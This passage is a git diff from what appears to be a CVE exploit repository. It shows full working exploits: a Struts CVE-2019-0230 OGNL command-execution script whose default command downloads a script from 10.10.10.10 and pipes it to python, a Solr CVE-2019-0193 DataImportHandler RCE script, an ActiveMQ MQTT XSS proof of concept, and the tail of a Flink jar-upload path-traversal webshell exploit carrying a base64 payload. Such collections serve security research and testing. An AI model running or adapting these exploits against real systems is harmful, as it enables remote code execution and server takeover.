base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA') + files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')} + r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) + print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) + +if __name__ == "__main__": + main() + + diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py index 1551ebacf75d0e0593f930cffcb3d6377d2b2f80..856fc4fc4e8046d89f931c09ea577aec9b3c63e2 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py @@ -1,163 +1,163 @@ -# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation -# Date: 08/18/2020 -# Exploit Author: West Shepherd -# Vendor Homepage: https://struts.apache.org/download.cgi -# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) -# CVE : CVE-2019-0230 -# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. -# Source(s): -# https://github.com/PrinceFPF/CVE-2019-0230 -# https://cwiki.apache.org/confluence/display/WW/S2-059 -# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 - -# !/usr/bin/python -from sys import argv, exit, stdout, stderr -import argparse -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -import logging - - -class Exploit: - def __init__( - self, - target='', - redirect=False, - proxy_address='' - ): - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - self.target = target - self.session = requests.session() - self.redirect = redirect - self.timeout = 0.5 - self.proxies = { - 'http': 'http://%s' % proxy_address, - 'https': 'http://%s' % proxy_address - } \ - if proxy_address is not None \ - and proxy_address != '' else {} - self.query_params = {} - self.form_values = {} - self.cookies = {} - boundary = "---------------------------735323031399963166993862150" - self.headers = { - 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, - 'Accept': '*/*', - 'Connection': 'close' - } - payload = "%{(#nike='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?(#_memberAccess=#dm):" \ - -"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." -\ - -"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." -\ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ - -"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." -\ - -"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new -java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ - -"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." -\ - -"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." -\ - "(#ros.flush())}" - - self.payload = "--%s\r\nContent-Disposition: form-data; -name=\"foo\"; " \ - "filename=\"%s\0b\"\r\nContent-Type: -text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( - boundary, payload, boundary - ) - - def do_get(self, url, params=None, data=None): - return self.session.get( - url=url, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - data=data, - params=params - ) - - def do_post(self, url, data=None, params=None): - return self.session.post( - url=url, - data=data, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - params=params - ) - - def debug(self): - try: - import http.client as http_client - except ImportError: - import httplib as http_client - http_client.HTTPConnection.debuglevel = 1 - logging.basicConfig() - logging.getLogger().setLevel(logging.DEBUG) - requests_log = logging.getLogger("requests.packages.urllib3") - requests_log.setLevel(logging.DEBUG) - requests_log.propagate = True - return self - - def send_payload(self, command='curl --insecure -sv -https://10.10.10.10/shell.py|python -'): - url = self.target - stdout.write('sending payload to %s payload %s' % (url, command)) - resp = self.do_post(url=url, params=self.query_params, -data=self.payload.replace('{COMMAND}', command)) - return resp - - -if __name__ == '__main__': - parser = argparse.ArgumentParser(add_help=True, - description='CVE-2020-0230 Struts -2 exploit') - try: - parser.add_argument('-target', action='store', help='Target -address: http(s)://target.com/index.action') - parser.add_argument('-command', action='store', - help='Command to execute: touch /tmp/pwn') - parser.add_argument('-debug', action='store', default=False, -help='Enable debugging: False') - parser.add_argument('-proxy', action='store', default='', -help='Enable proxy: 10.10.10.10:8080') - - if len(argv) == 1: - parser.print_help() - exit(1) - options = parser.parse_args() - - exp = Exploit( - proxy_address=options.proxy, - target=options.target - ) - - if options.debug: - exp.debug() - stdout.write('target %s debug %s proxy %s\n' % ( - options.target, options.debug, options.proxy - )) - - result = exp.send_payload(command=options.command) - stdout.write('Response: %d\n' % result.status_code) - - except Exception as error: - +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. +# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." +\ + +"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +\ + "(#ros.flush())}" + + self.payload = "--%s\r\nContent-Disposition: form-data; +name=\"foo\"; " \ + "filename=\"%s\0b\"\r\nContent-Type: +text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( + boundary, payload, boundary + ) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params + ) + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def send_payload(self, command='curl --insecure -sv +https://10.10.10.10/shell.py|python -'): + url = self.target + stdout.write('sending payload to %s payload %s' % (url, command)) + resp = self.do_post(url=url, params=self.query_params, +data=self.payload.replace('{COMMAND}', command)) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, + description='CVE-2020-0230 Struts +2 exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com/index.action') + parser.add_argument('-command', action='store', + help='Command to execute: touch /tmp/pwn') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s debug %s proxy %s\n' % ( + options.target, options.debug, options.proxy + )) + + result = exp.send_payload(command=options.command) + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/cve/apache-Struts/2019/CVE-2019-0230/README.md b/cve/apache-Struts/2019/CVE-2019-0230/README.md index b9a4f94c10b77c0c5162b3b51f0501e42824b08f..94d8caa358110a446ee55ab5edd18c33a0677b76 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/README.md +++ b/cve/apache-Struts/2019/CVE-2019-0230/README.md @@ -1,21 +1,21 @@ -# Apache Struts 2.5.20 - Double OGNL evaluation -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2019-0230 -Credits: Ash Daulton and the cPanel Security Team -# Usage -``` -python CVE-2019-0230.py + --target : Target address --command : Command to execute --debug : Enable debugging --proxy : Enable proxy -``` -# reference -http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html -http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -https://cwiki.apache.org/confluence/display/ww/s2-059 -https://launchpad.support.sap.com/#/notes/2982840 +# Apache Struts 2.5.20 - Double OGNL evaluation +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2019-0230 +Credits: Ash Daulton and the cPanel Security Team +# Usage +``` +python CVE-2019-0230.py + +-target : Target address +-command : Command to execute +-debug : Enable debugging +-proxy : Enable proxy +``` +# reference +http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html +http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html +https://cwiki.apache.org/confluence/display/ww/s2-059 +https://launchpad.support.sap.com/#/notes/2982840 https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e846ed2f110965d3d2507c6fad252e1246..819ec7b5063518722639574bf5a4687742af7370 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -1,24 +1,24 @@ -id: CVE-2019-0230 -source: https://www.exploit-db.com/exploits/49068 -info: - name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 - severity: critical - description: - Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 - scope-of-influence: - Struts 2.0.0 - Struts 2.5.20 - reference: - - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html - - https://cwiki.apache.org/confluence/display/ww/s2-059 - - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html - - https://launchpad.support.sap.com/#/notes/2982840 - - https://www.oracle.com/security-alerts/cpuApr2021.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-0230 - cwe-id: CWE-1321 - cnvd-id: None - kve-id: None - tags: - - 远程命令执行 +id: CVE-2019-0230 +source: https://www.exploit-db.com/exploits/49068 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: critical + description: + Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 + scope-of-influence: + Struts 2.0.0 - Struts 2.5.20 + reference: + - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html + - https://cwiki.apache.org/confluence/display/ww/s2-059 + - http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html + - https://launchpad.support.sap.com/#/notes/2982840 + - https://www.oracle.com/security-alerts/cpuApr2021.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0230 + cwe-id: CWE-1321 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 diff --git a/cve/apache-activemq/2020/CVE-2020-13932/poc.py b/cve/apache-activemq/2020/CVE-2020-13932/poc.py index d85d0d517cc1c81cff7b6232220daf4b64373f6c..62973a9b5b99d1a99f3d26773183d2953522f2f5 100644 --- a/cve/apache-activemq/2020/CVE-2020-13932/poc.py +++ b/cve/apache-activemq/2020/CVE-2020-13932/poc.py @@ -1,22 +1,22 @@ -import time -import socket -from scapy.contrib.mqtt import * -from scapy.compat import raw - -brokerIP = "" # input the server IP here -brokerPort = 1883 # The default listen port of MQTT is 1883 -clientid = "" #Malformed Clientid -malformedTopic = "" # Malformed Topic - -if __name__ == '__main__': - connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid) - # Malformed Connect Message - subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1) - # Malformed Subscribe Message - conn = socket.socket() - conn.connect((brokerIP, brokerPort)) - conn.send(raw(connMessage)) - time.sleep(1) - conn.send(raw(subMessage)) - input() # Keep the MQTT Connection - conn.close() +import time +import socket +from scapy.contrib.mqtt import * +from scapy.compat import raw + +brokerIP = "" # input the server IP here +brokerPort = 1883 # The default listen port of MQTT is 1883 +clientid = "" #Malformed Clientid +malformedTopic = "" # Malformed Topic + +if __name__ == '__main__': + connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid) + # Malformed Connect Message + subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1) + # Malformed Subscribe Message + conn = socket.socket() + conn.connect((brokerIP, brokerPort)) + conn.send(raw(connMessage)) + time.sleep(1) + conn.send(raw(subMessage)) + input() # Keep the MQTT Connection + conn.close() diff --git a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml index 1fa394da1d749c426810537db355ad59ff282b79..07b1b49671080e2684f48e1eb11d0cc262e59322 100644 --- a/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml +++ b/cve/apache-activemq/2020/yaml/CVE-2020-13932.yaml @@ -1,21 +1,21 @@ -id: CVE-2020-13932 -source: Original -info: - name: Apache ActiveMQ Artemis Clientid XSS - severity: Medium - description: | - In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section. - scope-of-influence: - Apache ActiveMQ Artemis 2.5.0 to 2.13.0 - reference: - https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt - https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt - https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-13932 - cwe-id: CWE-79 - cnvd-id: None - kve-id: None +id: CVE-2020-13932 +source: Original +info: + name: Apache ActiveMQ Artemis Clientid XSS + severity: Medium + description: | + In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section. + scope-of-influence: + Apache ActiveMQ Artemis 2.5.0 to 2.13.0 + reference: + https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt + https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt + https://lists.apache.org/thread.html/r7fcedcc89e5f296b174d6b8c1438c607c30d809c04292e5732d6e4eb@%3Cusers.activemq.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-13932 + cwe-id: CWE-79 + cnvd-id: None + kve-id: None tags: XSS \ No newline at end of file diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml index 991427c4e1db623fab13bf03fd2c1b384bd8296b..6d7583ba1237c6c483b5231c5554468c90a5d11a 100644 --- a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml +++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-42889 -source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC -info: - name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 - severity: CRITICAL - description: - Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 - scope-of-influence: - 1.5 <= Apache Commons Text <= 1.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 - - https://zhuanlan.zhihu.com/p/575580463 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-42889 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None +id: CVE-2022-42889 +source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC +info: + name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。 + severity: CRITICAL + description: + Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 + scope-of-influence: + 1.5 <= Apache Commons Text <= 1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-42889 + - https://zhuanlan.zhihu.com/p/575580463 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None tags: CVE-2022, Apache Commons Text \ No newline at end of file diff --git a/cve/apache-log4j/2021/CVE-2021-44228/poc.py b/cve/apache-log4j/2021/CVE-2021-44228/poc.py old mode 100755 new mode 100644 diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py index bf16b9feb546fd306ad22dfe6a47d7bfee252920..58a5b4544d415b89ee21a19036112b312bd6296a 100644 --- a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py +++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py @@ -1,91 +1,91 @@ -import requests -import json -import sys - - -banner = ''' - _______ ________ ___ ___ __ ___ ___ __ ___ ____ - / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \ - | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) | - | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ < - | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) | - \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/ - - python By jas502n -''' -print banner - -def admin_cores(url, cmd): - core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' - r = requests.get(url=core_selector_url) - json_strs = json.loads(r.text) - if r.status_code ==200 and "responseHeader" in r.text: - print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status'])) - for core_selector in json_strs['status']: - jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name'] - print '\n>>>>The Core Name = %s' % jas502n_Core_Name - show_config(url,jas502n_Core_Name) - get_config_name(url,jas502n_Core_Name) - URLDataSource_Poc(url,jas502n_Core_Name,cmd) - - else: - print "No core_selector Exit!" - - - - -def show_config(url,jas502n_Core_Name): - config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json" - r1 = requests.get(config_url) - - if r1.status_code ==200 and 'dataConfig' in r1.text: - print ">> config_url= %s"% config_url - print ">%s dataConfig Exit!" % jas502n_Core_Name - else: - print "dataConfig No Exit!" - - - -def get_config_name(url,jas502n_Core_Name): - get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json' - r2 = requests.get(get_config_url) - if r2.status_code ==200 and 'config' in r2.text: - print ">> get_config_url= %s" % get_config_url - r2_json = json.loads(r2.text) - r2_str = r2_json['initArgs'] - - print '>get_config_name= %s' % r2_str[1][1] - - else: - print "Core Config Name No Exit!" - - - -def URLDataSource_Poc(url,jas502n_Core_Name,cmd): - debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json' - payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd - headers = { - "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", - "Accept-Encoding":"gzip, deflate", - "Content-type":"application/x-www-form-urlencoded", - "X-Requested-With":"XMLHttpRequest", - "Referer":"http://%s/solr/" % url - - } - r3 = requests.post(url = debug_model_url, data=payload,headers=headers) - print ">>>>> debug_model_url= %s" % debug_model_url - if r3.status_code ==200 and 'Requests' in r3.text: - - print "Send Poc Success!" - else: - print "No Send Poc Success!" - print r3.text - - - -if __name__ == '__main__': - cmd = sys.argv[2] - url = sys.argv[1] +import requests +import json +import sys + + +banner = ''' + _______ ________ ___ ___ __ ___ ___ __ ___ ____ + / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \ + | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) | + | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ < + | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) | + \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/ + + python By jas502n +''' +print banner + +def admin_cores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status'])) + for core_selector in json_strs['status']: + jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name'] + print '\n>>>>The Core Name = %s' % jas502n_Core_Name + show_config(url,jas502n_Core_Name) + get_config_name(url,jas502n_Core_Name) + URLDataSource_Poc(url,jas502n_Core_Name,cmd) + + else: + print "No core_selector Exit!" + + + + +def show_config(url,jas502n_Core_Name): + config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json" + r1 = requests.get(config_url) + + if r1.status_code ==200 and 'dataConfig' in r1.text: + print ">> config_url= %s"% config_url + print ">%s dataConfig Exit!" % jas502n_Core_Name + else: + print "dataConfig No Exit!" + + + +def get_config_name(url,jas502n_Core_Name): + get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json' + r2 = requests.get(get_config_url) + if r2.status_code ==200 and 'config' in r2.text: + print ">> get_config_url= %s" % get_config_url + r2_json = json.loads(r2.text) + r2_str = r2_json['initArgs'] + + print '>get_config_name= %s' % r2_str[1][1] + + else: + print "Core Config Name No Exit!" + + + +def URLDataSource_Poc(url,jas502n_Core_Name,cmd): + debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = 